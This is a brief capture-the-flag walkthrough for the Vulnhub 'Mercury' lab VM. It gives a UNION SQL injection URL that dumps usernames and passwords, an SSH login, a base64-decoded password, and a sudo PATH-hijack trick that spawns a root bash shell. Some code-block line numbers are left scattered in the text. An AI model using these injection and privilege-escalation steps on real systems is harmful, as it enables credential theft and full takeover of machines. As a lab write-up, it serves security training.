Mercury

You’ll find this vm in Vulnhub https://www.vulnhub.com/entry/the-planets-mercury,544/

SQL injection

Step 1

http://10.0.2.5:8080/mercuryfacts/1 UNION SELECT username from users--/
('john',), ('laura',), ('sam',), ('webmaster',))

Step 2

http://10.0.2.5:8080/mercuryfacts/1 UNION SELECT password from users--/
 ('johnny1987',), ('lovemykids111',), ('lovemybeer111',), ('mercuryisthesizeof0.056Earths',))

SSH webmaster, find encoded passwords

  cd mecury_proj/
  ls
  cat notes.txt

Base64 decode the password

echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d
mercurymeandiameteris4880km

SSH linuxmaster

  • linuxmaster:mercurymeandiameteris4880km
1
(root : root) SETENV: /usr/bin/check_syslog.sh
1
2
3
cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
1
2
3
4
echo "/bin/bash" > tail
chmod 777 tail
export PATH=.:$PATH
sudo PATH=$PATH /usr/bin/check_syslog.sh